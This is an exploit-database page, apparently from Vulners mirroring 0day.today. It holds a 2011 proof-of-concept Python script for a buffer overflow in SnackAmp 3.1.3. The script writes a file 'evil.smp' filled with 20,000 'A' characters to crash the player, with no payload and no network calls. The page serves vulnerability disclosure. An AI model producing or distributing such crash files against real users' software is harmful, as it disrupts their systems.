Lucene search
K

SnackAmp 3.1.3 (smp) Buffer Overflow Vulnerability

🗓️ 06 Jul 2011 00:00:00Reported by X-h4ckType 
zdt
 zdt
🔗 0day.today👁 14 Views

SnackAmp 3.1.3 (smp) Buffer Overflow Vulnerability, Windows XP SP

Code
# ########################################
# Exploit Title : SnackAmp 3.1.3 (smp) Buffer Overflow Vulnerability
# Software link : http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/SnackAmp.shtml, sourceforge.net/projects/snackamp/
# Version       : 3.1.3
# Tested on     : Windows XP SP3 English
# Date          : 6/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , @PirateAL Crew , http://theflashcrew.blogspot.com
# Email         : [email protected]
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 
# ########################################

#!/usr/bin/python

filename = "evil.smp"

junk = "\x41" * 20000

FILE = open(filename, "w")
FILE.write(junk)
FILE.close()
print "Evil file created"



#  0day.today [2018-02-07]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8
14